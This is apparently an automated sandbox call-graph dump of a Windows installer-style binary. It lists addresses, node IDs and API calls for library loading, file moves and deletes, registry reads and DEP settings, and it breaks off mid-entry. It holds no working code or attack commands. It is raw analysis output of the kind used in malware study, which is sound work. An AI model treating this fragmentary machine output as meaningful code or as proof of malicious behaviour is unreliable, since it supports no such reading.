51627->52090 51629 403778 18 API calls 51633 457c0d 51629->51633 51630 457c5b 51631 457c8a 51630->51631 51635 403778 18 API calls 51630->51635 51633->51629 51633->51630 51634 457b50 34 API calls 51633->51634 51634->51633 52094 403738 51638->52094 52089->51624 52090->51633 52093->51620 52095 40373c SetCurrentDirectoryA 52094->52095 52095->51435 53308 431eec 53269->53308 53271 403400 4 API calls 53272 43da76 53271->53272 53272->50235 53272->50236 53273 43d9f2 53273->53271 53275 431bd6 53274->53275 53276 402648 18 API calls 53275->53276 53277 431c06 53276->53277 53278 494368 53277->53278 53279 49443d 53278->53279 53280 494382 53278->53280 53285 494480 53279->53285 53280->53279 53281 433d6c 18 API calls 53280->53281 53284 403450 18 API calls 53280->53284 53313 408c0c 18 API calls 53280->53313 53314 431ca0 53280->53314 53281->53280 53284->53280 53286 49449c 53285->53286 53322 433d6c 53286->53322 53288 4944a1 53289 431ca0 18 API calls 53288->53289 53290 4944ac 53289->53290 53291 43d594 53290->53291 53292 43d5c1 53291->53292 53297 43d5b3 53291->53297 53292->50246 53293 43d63d 53301 43d6f7 53293->53301 53325 447084 53293->53325 53295 43d688 53331 43dd50 53295->53331 53297->53292 53297->53293 53298 447084 18 API calls 53297->53298 53298->53297 53299 43d8fd 53299->53292 53351 447024 18 API calls 53299->53351 53301->53299 53302 43d8de 53301->53302 53349 447024 18 API calls 53301->53349 53350 447024 18 API calls 53302->53350 53305->50248 53306->50250 53307->50237 53309 403494 4 API calls 53308->53309 53311 431efb 53309->53311 53310 431f25 53310->53273 53311->53310 53312 403744 18 API calls 53311->53312 53312->53311 53313->53280 53315 431cc0 53314->53315 53316 431cae 53314->53316 53318 431ce2 53315->53318 53321 431c40 18 API calls 53315->53321 53320 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53316->53320 53318->53280 53320->53315 53321->53318 53323 402648 18 API calls 53322->53323 53324 433d7b 53323->53324 53324->53288 53326 4470a3 53325->53326 53327 4470aa 
53325->53327 53352 446e30 18 API calls 53326->53352 53329 431ca0 18 API calls 53327->53329 53330 4470ba 53329->53330 53330->53295 53332 43dd6c 53331->53332 53337 43dd99 53331->53337 53333 402660 4 API calls 53332->53333 53332->53337 53333->53332 53334 43ddce 53334->53301 53336 43fea5 53336->53334 53362 447024 18 API calls 53336->53362 53337->53334 53337->53336 53338 447024 18 API calls 53337->53338 53340 43c938 18 API calls 53337->53340 53341 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53337->53341 53345 433d18 18 API calls 53337->53345 53346 436650 18 API calls 53337->53346 53347 431c40 18 API calls 53337->53347 53348 446e30 18 API calls 53337->53348 53353 4396e0 53337->53353 53359 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53337->53359 53360 43dc48 32 API calls 53337->53360 53361 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53337->53361 53338->53337 53340->53337 53341->53337 53345->53337 53346->53337 53347->53337 53348->53337 53349->53301 53350->53299 53351->53299 53352->53327 53354 4396e9 53353->53354 53355 403400 4 API calls 53354->53355 53356 43c8e8 53355->53356 53359->53337 53360->53337 53361->53337 53362->53336 57628 42f520 57629 42f52b 57628->57629 57630 42f52f NtdllDefWindowProc_A 57628->57630 57630->57629 53365 416b42 53366 416bea 53365->53366 53367 416b5a 53365->53367 53384 41531c 18 API calls 53366->53384 53369 416b74 SendMessageA 53367->53369 53370 416b68 53367->53370 53380 416bc8 53369->53380 53371 416b72 CallWindowProcA 53370->53371 53372 416b8e 53370->53372 53371->53380 53381 41a058 GetSysColor 53372->53381 53375 416b99 SetTextColor 53376 416bae 53375->53376 53382 41a058 GetSysColor 53376->53382 53378 416bb3 SetBkColor 53383 41a6e0 GetSysColor CreateBrushIndirect 53378->53383 53381->53375 53382->53378 53383->53380 53384->53380 57631 4358e0 57632 4358f5 57631->57632 57636 43590f 57632->57636 57637 4352c8 57632->57637 57641 4352f8 57637->57641 57647 435312 57637->57647 57638 403400 4 API calls 57639 435717 57638->57639 
57639->57636 57650 435728 18 API calls 57639->57650 57640 446da4 18 API calls 57640->57641 57641->57640 57642 403450 18 API calls 57641->57642 57643 402648 18 API calls 57641->57643 57645 431ca0 18 API calls 57641->57645 57646 4038a4 18 API calls 57641->57646 57641->57647 57648 403744 18 API calls 57641->57648 57651 4343b0 57641->57651 57663 434b74 18 API calls 57641->57663 57642->57641 57643->57641 57645->57641 57646->57641 57647->57638 57648->57641 57650->57636 57652 43446d 57651->57652 57653 4343dd 57651->57653 57682 434310 18 API calls 57652->57682 57655 403494 4 API calls 57653->57655 57657 4343eb 57655->57657 57656 43445f 57658 403400 4 API calls 57656->57658 57659 403778 18 API calls 57657->57659 57660 4344bd 57658->57660 57661 43440c 57659->57661 57660->57641 57661->57656 57664 4944b4 57661->57664 57663->57641 57665 4944ec 57664->57665 57666 494584 57664->57666 57667 403494 4 API calls 57665->57667 57683 448930 57666->57683 57671 4944f7 57667->57671 57669 403400 4 API calls 57670 4945a8 57669->57670 57672 403400 4 API calls 57670->57672 57673 4037b8 18 API calls 57671->57673 57676 494507 57671->57676 57674 4945b0 57672->57674 57675 494520 57673->57675 57674->57661 57675->57676 57677 4037b8 18 API calls 57675->57677 57676->57669 57678 494543 57677->57678 57679 403778 18 API calls 57678->57679 57680 494574 57679->57680 57681 403634 18 API calls 57680->57681 57681->57666 57682->57656 57684 448955 57683->57684 57694 448998 57683->57694 57685 403494 4 API calls 57684->57685 57687 448960 57685->57687 57686 4489ac 57689 403400 4 API calls 57686->57689 57691 4037b8 18 API calls 57687->57691 57690 4489df 57689->57690 57690->57676 57692 44897c 57691->57692 57693 4037b8 18 API calls 57692->57693 57693->57694 57694->57686 57695 44852c 57694->57695 57696 403494 4 API calls 57695->57696 57697 448562 57696->57697 57698 4037b8 18 API calls 57697->57698 57699 448574 57698->57699 57700 403778 18 API calls 57699->57700 57701 448595 57700->57701 57702 4037b8 18 API calls 
57701->57702 57703 4485ad 57702->57703 57704 403778 18 API calls 57703->57704 57705 4485d8 57704->57705 57706 4037b8 18 API calls 57705->57706 57717 4485f0 57706->57717 57707 448628 57709 403420 4 API calls 57707->57709 57708 4486c3 57712 4486cb GetProcAddress 57708->57712 57713 448708 57709->57713 57710 44864b LoadLibraryExA 57710->57717 57711 44865d LoadLibraryA 57711->57717 57714 4486de 57712->57714 57713->57686 57714->57707 57715 403b80 18 API calls 57715->57717 57716 403450 18 API calls 57716->57717 57717->57707 57717->57708 57717->57710 57717->57711 57717->57715 57717->57716 57719 43da88 18 API calls 57717->57719 57719->57717 53385 416644 53386 416651 53385->53386 53387 4166ab 53385->53387 53392 416550 CreateWindowExA 53386->53392 53388 416658 SetPropA SetPropA 53388->53387 53389 41668b 53388->53389 53390 41669e SetWindowPos 53389->53390 53390->53387 53392->53388 57720 4222e4 57721 4222f3 57720->57721 57726 421274 57721->57726 57724 422313 57727 4212e3 57726->57727 57741 421283 57726->57741 57730 4212f4 57727->57730 57751 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 57727->57751 57729 421322 57733 421395 57729->57733 57738 42133d 57729->57738 57730->57729 57732 4213ba 57730->57732 57731 421393 57734 4213e6 57731->57734 57753 421e2c 25 API calls 57731->57753 57732->57731 57736 4213ce SetMenu 57732->57736 57733->57731 57740 4213a9 57733->57740 57754 4211bc 24 API calls 57734->57754 57736->57731 57738->57731 57744 421360 GetMenu 57738->57744 57739 4213ed 57739->57724 57749 4221e8 10 API calls 57739->57749 57743 4213b2 SetMenu 57740->57743 57741->57727 57750 408d2c 33 API calls 57741->57750 57743->57731 57745 421383 57744->57745 57746 42136a 57744->57746 57752 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 57745->57752 57748 42137d SetMenu 57746->57748 57748->57745 57749->57724 57750->57741 57751->57730 57752->57731 57753->57734 57754->57739 53393 480441 53398 451004 53393->53398 53395 480455 53408 47f4f0 53395->53408 53397 480479 53399 451011 
53398->53399 53401 451065 53399->53401 53414 408c0c 18 API calls 53399->53414 53402 450e88 InterlockedExchange 53401->53402 53403 451077 53402->53403 53405 45108d 53403->53405 53415 408c0c 18 API calls 53403->53415 53406 4510d0 53405->53406 53416 408c0c 18 API calls 53405->53416 53406->53395 53417 40b3c8 53408->53417 53410 47f55d 53410->53397 53411 4069dc 18 API calls 53412 47f512 53411->53412 53412->53410 53412->53411 53421 4764b4 53412->53421 53414->53401 53415->53405 53416->53406 53418 40b3d3 53417->53418 53419 40b3f3 53418->53419 53437 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53418->53437 53419->53412 53433 47652e 53421->53433 53434 4764e5 53421->53434 53422 476579 53438 451294 53422->53438 53423 451294 35 API calls 53423->53434 53425 451294 35 API calls 53425->53433 53426 476590 53428 403420 4 API calls 53426->53428 53427 4038a4 18 API calls 53427->53434 53430 4765aa 53428->53430 53429 4038a4 18 API calls 53429->53433 53430->53412 53431 403744 18 API calls 53431->53434 53432 403450 18 API calls 53432->53434 53433->53422 53433->53425 53433->53429 53435 403450 18 API calls 53433->53435 53436 403744 18 API calls 53433->53436 53434->53423 53434->53427 53434->53431 53434->53432 53434->53433 53435->53433 53436->53433 53437->53419 53439 4512a4 53438->53439 53440 4512af 53438->53440 53439->53426 53444 451238 35 API calls 53440->53444 53442 4512ba 53442->53439 53445 408c0c 18 API calls 53442->53445 53444->53442 53445->53439 57755 44b4a8 57756 44b4b6 57755->57756 57758 44b4d5 57755->57758 57757 44b38c 25 API calls 57756->57757 57756->57758 57757->57758 57759 448728 57760 448756 57759->57760 57761 44875d 57759->57761 57764 403400 4 API calls 57760->57764 57762 448771 57761->57762 57765 44852c 21 API calls 57761->57765 57762->57760 57763 403494 4 API calls 57762->57763 57766 44878a 57763->57766 57767 448907 57764->57767 57765->57762 57768 4037b8 18 API calls 57766->57768 57769 4487a6 57768->57769 57770 4037b8 18 API calls 57769->57770 57771 4487c2 
57770->57771 57771->57760 57772 4487d6 57771->57772 57773 4037b8 18 API calls 57772->57773 57774 4487f0 57773->57774 57775 431bd0 18 API calls 57774->57775 57776 448812 57775->57776 57777 431ca0 18 API calls 57776->57777 57778 448832 57776->57778 57777->57776 57781 448870 57778->57781 57802 4435d0 18 API calls 57778->57802 57785 448888 57781->57785 57803 4435d0 18 API calls 57781->57803 57782 4488bc GetLastError 57804 4484c0 18 API calls 57782->57804 57791 442334 57785->57791 57786 4488cb 57805 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57786->57805 57788 4488e0 57806 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57788->57806 57790 4488e8 57792 443312 57791->57792 57793 44236d 57791->57793 57795 403400 4 API calls 57792->57795 57794 403400 4 API calls 57793->57794 57796 442375 57794->57796 57797 443327 57795->57797 57798 431bd0 18 API calls 57796->57798 57797->57782 57800 442381 57798->57800 57799 443302 57799->57782 57800->57799 57807 441a0c 18 API calls 57800->57807 57802->57778 57803->57785 57804->57786 57805->57788 57806->57790 57807->57800 57808 4165ec DestroyWindow 57809 4915e4 57810 49161e 57809->57810 57811 49162a 57810->57811 57812 491620 57810->57812 57814 491639 57811->57814 57815 491662 57811->57815 58005 409098 MessageBeep 57812->58005 57817 446ff8 32 API calls 57814->57817 57820 49169a 57815->57820 57821 491671 57815->57821 57816 403420 4 API calls 57818 491c76 57816->57818 57819 491646 57817->57819 57822 403400 4 API calls 57818->57822 57823 406bb0 18 API calls 57819->57823 57830 4916a9 57820->57830 57831 4916d2 57820->57831 57824 446ff8 32 API calls 57821->57824 57825 491c7e 57822->57825 57826 491651 57823->57826 57827 49167e 57824->57827 58006 44734c 19 API calls 57826->58006 58007 406c00 18 API calls 57827->58007 57833 446ff8 32 API calls 57830->57833 57836 4916fa 57831->57836 57837 4916e1 57831->57837 57832 491689 58008 44734c 19 API calls 57832->58008 57835 4916b6 57833->57835 58009 406c34 18 API calls 57835->58009 57844 
491709 57836->57844 57845 49172e 57836->57845 58011 407280 19 API calls 57837->58011 57840 4916c1 58010 44734c 19 API calls 57840->58010 57842 4916e9 58012 44734c 19 API calls 57842->58012 57847 446ff8 32 API calls 57844->57847 57850 49173d 57845->57850 57851 491766 57845->57851 57846 491625 57846->57816 57848 491716 57847->57848 57849 4072a8 SetCurrentDirectoryA 57848->57849 57852 49171e 57849->57852 57853 446ff8 32 API calls 57850->57853 57856 49179e 57851->57856 57857 491775 57851->57857 58013 4470d0 19 API calls 57852->58013 57855 49174a 57853->57855 57858 42c804 19 API calls 57855->57858 57864 4917ea 57856->57864 57865 4917ad 57856->57865 57859 446ff8 32 API calls 57857->57859 57860 491755 57858->57860 57861 491782 57859->57861 58014 44734c 19 API calls 57860->58014 58015 4071f8 22 API calls 57861->58015 57870 4917f9 57864->57870 57871 491822 57864->57871 57867 446ff8 32 API calls 57865->57867 57866 49178d 58016 44734c 19 API calls 57866->58016 57869 4917bc 57867->57869 57872 446ff8 32 API calls 57869->57872 57873 446ff8 32 API calls 57870->57873 57877 49185a 57871->57877 57878 491831 57871->57878 57874 4917cd 57872->57874 57876 491806 57873->57876 58017 4912e8 22 API calls 57874->58017 57880 42c8a4 19 API calls 57876->57880 57887 491869 57877->57887 57888 491892 57877->57888 57881 446ff8 32 API calls 57878->57881 57879 4917d9 58018 44734c 19 API calls 57879->58018 57883 491811 57880->57883 57884 49183e 57881->57884 58019 44734c 19 API calls 57883->58019 57886 42c8cc 19 API calls 57884->57886 57889 491849 57886->57889 57890 446ff8 32 API calls 57887->57890 57893 4918ca 57888->57893 57894 4918a1 57888->57894 58020 44734c 19 API calls 57889->58020 57892 491876 57890->57892 58021 42c8fc 19 API calls 57892->58021 57901 4918d9 57893->57901 57902 491902 57893->57902 57896 446ff8 32 API calls 57894->57896 57899 4918ae 57896->57899 57897 491881 58022 44734c 19 API calls 57897->58022 57900 42c92c 19 API calls 57899->57900 57904 4918b9 57900->57904 57903 446ff8 32 API 
calls 57901->57903 57908 49194e 57902->57908 57909 491911 57902->57909 57905 4918e6 57903->57905 58023 44734c 19 API calls 57904->58023 57907 42c954 19 API calls 57905->57907 57910 4918f1 57907->57910 57914 49195d 57908->57914 57915 4919a0 57908->57915 57911 446ff8 32 API calls 57909->57911 58024 44734c 19 API calls 57910->58024 57913 491920 57911->57913 57916 446ff8 32 API calls 57913->57916 57917 446ff8 32 API calls 57914->57917 57921 4919af 57915->57921 57922 491a13 57915->57922 57918 491931 57916->57918 57919 491970 57917->57919 58025 42c4f8 19 API calls 57918->58025 57923 446ff8 32 API calls 57919->57923 57926 446ff8 32 API calls 57921->57926 57930 491a52 57922->57930 57931 491a22 57922->57931 57927 491981 57923->57927 57924 49193d 58026 44734c 19 API calls 57924->58026 57928 4919bc 57926->57928 58027 4914e0 26 API calls 57927->58027 57997 42c608 21 API calls 57928->57997 57942 491a91 57930->57942 57943 491a61 57930->57943 57934 446ff8 32 API calls 57931->57934 57933 49198f 58028 44734c 19 API calls 57933->58028 57937 491a2f 57934->57937 57935 4919ca 57938 4919ce 57935->57938 57939 491a03 57935->57939 58031 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 57937->58031 57941 446ff8 32 API calls 57938->57941 58030 4470d0 19 API calls 57939->58030 57946 4919dd 57941->57946 57952 491ad0 57942->57952 57953 491aa0 57942->57953 57947 446ff8 32 API calls 57943->57947 57945 491a3c 58032 4470d0 19 API calls 57945->58032 57998 452c80 57946->57998 57950 491a6e 57947->57950 57951 452770 5 API calls 57950->57951 57956 491a7b 57951->57956 57961 491b18 57952->57961 57962 491adf 57952->57962 57957 446ff8 32 API calls 57953->57957 57954 491a4d 57954->57846 57955 4919ed 58029 4470d0 19 API calls 57955->58029 58033 4470d0 19 API calls 57956->58033 57960 491aad 57957->57960 58034 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 57960->58034 57969 491b60 
57961->57969 57970 491b27 57961->57970 57964 446ff8 32 API calls 57962->57964 57966 491aee 57964->57966 57965 491aba 58035 4470d0 19 API calls 57965->58035 57968 446ff8 32 API calls 57966->57968 57971 491aff 57968->57971 57975 491b73 57969->57975 57981 491c29 57969->57981 57972 446ff8 32 API calls 57970->57972 57977 447278 19 API calls 57971->57977 57973 491b36 57972->57973 57974 446ff8 32 API calls 57973->57974 57976 491b47 57974->57976 57978 446ff8 32 API calls 57975->57978 57982 447278 19 API calls 57976->57982 57977->57846 57979 491ba0 57978->57979 57980 446ff8 32 API calls 57979->57980 57983 491bb7 57980->57983 57981->57846 58039 446f9c 32 API calls 57981->58039 57982->57846 58036 407ddc 21 API calls 57983->58036 57985 491c42 57986 42e8c8 19 API calls 57985->57986 57987 491c4a 57986->57987 58040 44734c 19 API calls 57987->58040 57990 491bd9 57991 446ff8 32 API calls 57990->57991 57992 491bed 57991->57992 58037 408508 18 API calls 57992->58037 57994 491bf8 58038 44734c 19 API calls 57994->58038 57996 491c04 57997->57935 57999 452724 2 API calls 57998->57999 58001 452c99 57999->58001 58000 452c9d 58000->57955 58001->58000 58002 452cc1 MoveFileA GetLastError 58001->58002 58003 452760 Wow64RevertWow64FsRedirection 58002->58003 58004 452ce7 58003->58004 58004->57955 58005->57846 58006->57846 58007->57832 58008->57846 58009->57840 58010->57846 58011->57842 58012->57846 58013->57846 58014->57846 58015->57866 58016->57846 58017->57879 58018->57846 58019->57846 58020->57846 58021->57897 58022->57846 58023->57846 58024->57846 58025->57924 58026->57846 58027->57933 58028->57846 58029->57846 58030->57846 58031->57945 58032->57954 58033->57846 58034->57965 58035->57846 58036->57990 58037->57994 58038->57996 58039->57985 58040->57846 58041 42e3ef SetErrorMode 53446 441394 53447 44139d 53446->53447 53448 4413ab WriteFile 53446->53448 53447->53448 53449 4413b6 53448->53449 53450 416410 53451 416422 53450->53451 53452 416462 GetClassInfoA 53451->53452 53470 408d2c 33 API calls 
53451->53470 53453 41648e 53452->53453 53455 4164b0 RegisterClassA 53453->53455 53456 4164a0 UnregisterClassA 53453->53456 53458 4164ee 53453->53458 53457 4164d8 53455->53457 53455->53458 53456->53455 53460 408cbc 19 API calls 53457->53460 53461 416517 53458->53461 53462 4164e9 53458->53462 53459 41645d 53459->53452 53460->53462 53471 407544 53461->53471 53462->53458 53463 408cbc 19 API calls 53462->53463 53463->53461 53467 416530 53468 41a1e8 19 API calls 53467->53468 53469 41653a 53468->53469 53470->53459 53472 407552 53471->53472 53473 407548 53471->53473 53475 418384 7 API calls 53472->53475 53474 402660 4 API calls 53473->53474 53474->53472 53475->53467 53476 498718 53534 403344 53476->53534 53478 498726 53537 4056a0 53478->53537 53480 49872b 53540 40631c GetModuleHandleA GetProcAddress 53480->53540 53484 498735 53548 40994c 53484->53548 53815 4032fc 53534->53815 53536 403349 GetModuleHandleA GetCommandLineA 53536->53478 53539 4056db 53537->53539 53816 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53537->53816 53539->53480 53541 406338 53540->53541 53542 40633f GetProcAddress 53540->53542 53541->53542 53543 406355 GetProcAddress 53542->53543 53544 40634e 53542->53544 53545 406364 SetProcessDEPPolicy 53543->53545 53546 406368 53543->53546 53544->53543 53545->53546 53547 4063c4 6F541CD0 53546->53547 53547->53484 53817 409024 53548->53817 53815->53536 53816->53539 53818 408cbc 19 API calls 53817->53818 53819 409035 53818->53819 53820 4085dc GetSystemDefaultLCID 53819->53820 53821 408612 53820->53821 53822 403450 18 API calls 53821->53822 53823 406dec 19 API calls 53821->53823 53824 408568 19 API calls 53821->53824 53827 408674 53821->53827 53822->53821 53823->53821 53824->53821 53825 406dec 19 API calls 53825->53827 53826 408568 19 API calls 53826->53827 53827->53825 53827->53826 53828 403450 18 API calls 53827->53828 53829 4086f7 53827->53829 53828->53827 53830 403420 4 API calls 53829->53830 53831 408711 53830->53831 53832 408720 GetSystemDefaultLCID 
53831->53832 53889 408568 GetLocaleInfoA 53832->53889 53835 403450 18 API calls 53836 408760 53835->53836 53837 408568 19 API calls 53836->53837 53838 408775 53837->53838 53839 408568 19 API calls 53838->53839 53840 408799 53839->53840 53895 4085b4 GetLocaleInfoA 53840->53895 53843 4085b4 GetLocaleInfoA 53844 4087c9 53843->53844 53845 408568 19 API calls 53844->53845 53846 4087e3 53845->53846 53847 4085b4 GetLocaleInfoA 53846->53847 53848 408800 53847->53848 53849 408568 19 API calls 53848->53849 53850 40881a 53849->53850 53851 403450 18 API calls 53850->53851 53890 4085a1 53889->53890 53891 40858f 53889->53891 53893 403494 4 API calls 53890->53893 53892 4034e0 18 API calls 53891->53892 53894 40859f 53892->53894 53893->53894 53894->53835 53896 4085d0 53895->53896 53896->53843 55266 4804db 55267 4804e4 55266->55267 55268 48050f 55266->55268 55267->55268 55269 480501 55267->55269 55272 48054e 55268->55272 55640 47ef88 18 API calls 55268->55640 55638 476770 203 API calls 55269->55638 55271 480572 55279 4805ae 55271->55279 55280 480590 55271->55280 55272->55271 55275 480565 55272->55275 55276 480567 55272->55276 55274 480541 55641 47eff0 56 API calls 55274->55641 55283 47efcc 56 API calls 55275->55283 55642 47f060 56 API calls 55276->55642 55277 480506 55277->55268 55639 408be0 19 API calls 55277->55639 55645 47ee20 38 API calls 55279->55645 55284 4805a5 55280->55284 55643 47eff0 56 API calls 55280->55643 55283->55271 55644 47ee20 38 API calls 55284->55644 55288 4805ac 55289 4805be 55288->55289 55290 4805c4 55288->55290 55291 4805c2 55289->55291 55294 47efcc 56 API calls 55289->55294 55290->55291 55292 47efcc 56 API calls 55290->55292 55392 47c15c 55291->55392 55292->55291 55294->55291 55295 4805eb 55393 42d898 GetWindowsDirectoryA 55392->55393 55394 47c180 55393->55394 55395 403450 18 API calls 55394->55395 55396 47c18d 55395->55396 55397 42d8c4 GetSystemDirectoryA 55396->55397 55398 47c195 55397->55398 55399 403450 18 API calls 55398->55399 55400 47c1a2 55399->55400 
55401 42d8f0 6 API calls 55400->55401 55402 47c1aa 55401->55402 55403 403450 18 API calls 55402->55403 55404 47c1b7 55403->55404 55405 47c1c0 55404->55405 55406 47c1dc 55404->55406 55677 42d208 55405->55677 55408 403400 4 API calls 55406->55408 55410 47c1da 55408->55410 55412 47c221 55410->55412 55413 42c8cc 19 API calls 55410->55413 55411 403450 18 API calls 55411->55410 55657 47bfe4 55412->55657 55415 47c1fc 55413->55415 55417 403450 18 API calls 55415->55417 55419 47c209 55417->55419 55418 403450 18 API calls 55420 47c23d 55418->55420 55419->55412 55422 403450 18 API calls 55419->55422 55421 47c25b 55420->55421 55423 4035c0 18 API calls 55420->55423 55424 47bfe4 22 API calls 55421->55424 55422->55412 55423->55421 55425 47c26a 55424->55425 55426 403450 18 API calls 55425->55426 55427 47c277 55426->55427 55428 47c29f 55427->55428 55429 42c3fc 19 API calls 55427->55429 55430 47c306 55428->55430 55433 47bfe4 22 API calls 55428->55433 55431 47c28d 55429->55431 55432 47c3ce 55430->55432 55437 47c326 SHGetKnownFolderPath 55430->55437 55436 4035c0 18 API calls 55431->55436 55434 47c3d7 55432->55434 55435 47c3f8 55432->55435 55438 47c2b7 55433->55438 55439 42c3fc 19 API calls 55434->55439 55440 42c3fc 19 API calls 55435->55440 55436->55428 55441 47c340 55437->55441 55442 47c37b SHGetKnownFolderPath 55437->55442 55443 403450 18 API calls 55438->55443 55444 47c3e4 55439->55444 55445 47c405 55440->55445 55687 403ba4 21 API calls 55441->55687 55442->55432 55447 47c395 55442->55447 55452 47c2c4 55443->55452 55448 4035c0 18 API calls 55444->55448 55449 4035c0 18 API calls 55445->55449 55688 403ba4 21 API calls 55447->55688 55450 47c35b CoTaskMemFree 55450->55295 55451 47c2d7 55452->55451 55685 453344 18 API calls 55452->55685 55456 47c3b0 CoTaskMemFree 55456->55295 55638->55277 55640->55274 55641->55272 55642->55271 55643->55284 55644->55288 55645->55288 55658 42de1c RegOpenKeyExA 55657->55658 55659 47c00a 55658->55659 55660 47c030 55659->55660 55661 47c00e 55659->55661 55663 
403400 4 API calls 55660->55663 55662 42dd4c 20 API calls 55661->55662 55664 47c01a 55662->55664 55665 47c037 55663->55665 55666 47c025 RegCloseKey 55664->55666 55667 403400 4 API calls 55664->55667 55665->55418 55666->55665 55667->55666 55678 4038a4 18 API calls 55677->55678 55679 42d21b 55678->55679 55680 42d232 GetEnvironmentVariableA 55679->55680 55684 42d245 55679->55684 55689 42dbd0 18 API calls 55679->55689 55680->55679 55681 42d23e 55680->55681 55683 403400 4 API calls 55681->55683 55683->55684 55684->55411 55685->55451 55687->55450 55688->55456 55689->55679 58042 40cc34 58045 406f10 WriteFile 58042->58045 58046 406f2d 58045->58046 57159 41ee54 57160 41ee63 IsWindowVisible 57159->57160 57161 41ee99 57159->57161 57160->57161 57162 41ee6d IsWindowEnabled 57160->57162 57162->57161 57163 41ee77 57162->57163 57164 402648 18 API calls 57163->57164 57165 41ee81 EnableWindow 57164->57165 57165->57161 57166 41fb58 57167 41fb61 57166->57167 57170 41fdfc 57167->57170 57169 41fb6e 57171 41feee 57170->57171 57172 41fe13 57170->57172 57171->57169 57172->57171 57191 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 57172->57191 57174 41fe49 57175 41fe73 57174->57175 57176 41fe4d 57174->57176 57201 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 57175->57201 57192 41fb9c 57176->57192 57180 41fe81 57182 41fe85 57180->57182 57183 41feab 57180->57183 57181 41fb9c 10 API calls 57185 41fe71 57181->57185 57186 41fb9c 10 API calls 57182->57186 57184 41fb9c 10 API calls 57183->57184 57187 41febd 57184->57187 57185->57169 57188 41fe97 57186->57188 57189 41fb9c 10 API calls 57187->57189 57190 41fb9c 10 API calls 57188->57190 57189->57185 57190->57185 57191->57174 57193 41fbb7 57192->57193 57194 41fbcd 57193->57194 57195 41f93c 4 API calls 57193->57195 57202 41f93c 57194->57202 57195->57194 57197 41fc15 57198 41fc38 SetScrollInfo 57197->57198 57210 41fa9c 57198->57210 57201->57180 57203 4181e0 57202->57203 57204 41f959 GetWindowLongA 
57203->57204 57205 41f996 57204->57205 57206 41f976 57204->57206 57222 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 57205->57222 57221 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 57206->57221 57209 41f982 57209->57197 57211 41faaa 57210->57211 57212 41fab2 57210->57212 57211->57181 57213 41faef 57212->57213 57214 41faf1 57212->57214 57215 41fae1 57212->57215 57217 41fb31 GetScrollPos 57213->57217 57224 417e48 IsWindowVisible ScrollWindow SetWindowPos 57214->57224 57223 417e48 IsWindowVisible ScrollWindow SetWindowPos 57215->57223 57217->57211 57219 41fb3c 57217->57219 57220 41fb4b SetScrollPos 57219->57220 57220->57211 57221->57209 57222->57209 57223->57213 57224->57213 57225 420598 57226 4205ab 57225->57226 57246 415b30 57226->57246 57228 4206f2 57229 420709 57228->57229 57253 4146d4 KiUserCallbackDispatcher 57228->57253 57233 420720 57229->57233 57254 414718 KiUserCallbackDispatcher 57229->57254 57230 420651 57251 420848 34 API calls 57230->57251 57231 4205e6 57231->57228 57231->57230 57239 420642 MulDiv 57231->57239 57236 420742 57233->57236 57255 420060 12 API calls 57233->57255 57237 42066a 57237->57228 57252 420060 12 API calls 57237->57252 57250 41a304 19 API calls 57239->57250 57242 420687 57243 4206a3 MulDiv 57242->57243 57244 4206c6 57242->57244 57243->57244 57244->57228 57245 4206cf MulDiv 57244->57245 57245->57228 57247 415b42 57246->57247 57256 414470 57247->57256 57249 415b5a 57249->57231 57250->57230 57251->57237 57252->57242 57253->57229 57254->57233 57255->57236 57257 41448a 57256->57257 57260 410458 57257->57260 57259 4144a0 57259->57249 57263 40dca4 57260->57263 57262 41045e 57262->57259 57264 40dd06 57263->57264 57265 40dcb7 57263->57265 57270 40dd14 57264->57270 57268 40dd14 33 API calls 57265->57268 57269 40dce1 57268->57269 57269->57262 57271 40dd24 57270->57271 57273 40dd3a 57271->57273 57282 40e09c 57271->57282 57298 40d5e0 57271->57298 57301 40df4c 57273->57301 57276 40dd42 57277 40d5e0 19 API calls 57276->57277 
57278 40ddae 57276->57278 57304 40db60 57276->57304 57277->57276 57280 40df4c 19 API calls 57278->57280 57281 40dd10 57280->57281 57281->57262 57283 40e96c 19 API calls 57282->57283 57284 40e0d7 57283->57284 57285 403778 18 API calls 57284->57285 57286 40e18d 57284->57286 57372 40d774 19 API calls 57284->57372 57373 40e080 19 API calls 57284->57373 57285->57284 57287 40e1b7 57286->57287 57288 40e1a8 57286->57288 57369 40ba24 57287->57369 57318 40e3c0 57288->57318 57294 40e1b5 57295 403400 4 API calls 57294->57295 57296 40e25c 57295->57296 57296->57271 57299 40ea08 19 API calls 57298->57299 57300 40d5ea 57299->57300 57300->57271 57406 40d4bc 57301->57406 57305 40df54 19 API calls 57304->57305 57306 40db93 57305->57306 57307 40e96c 19 API calls 57306->57307 57308 40db9e 57307->57308 57309 40e96c 19 API calls 57308->57309 57310 40dba9 57309->57310 57311 40dbc4 57310->57311 57312 40dbbb 57310->57312 57317 40dbc1 57310->57317 57415 40d9d8 57311->57415 57418 40dac8 33 API calls 57312->57418 57315 403420 4 API calls 57316 40dc8f 57315->57316 57316->57276 57317->57315 57319 40e3f6 57318->57319 57320 40e3ec 57318->57320 57322 40e511 57319->57322 57323 40e495 57319->57323 57324 40e4f6 57319->57324 57325 40e576 57319->57325 57326 40e438 57319->57326 57327 40e4d9 57319->57327 57328 40e47a 57319->57328 57329 40e4bb 57319->57329 57340 40e45c 57319->57340 57375 40d440 19 API calls 57320->57375 57331 40d764 19 API calls 57322->57331 57383 40de24 19 API calls 57323->57383 57388 40e890 19 API calls 57324->57388 57335 40d764 19 API calls 57325->57335 57376 40d764 57326->57376 57386 40e9a8 19 API calls 57327->57386 57382 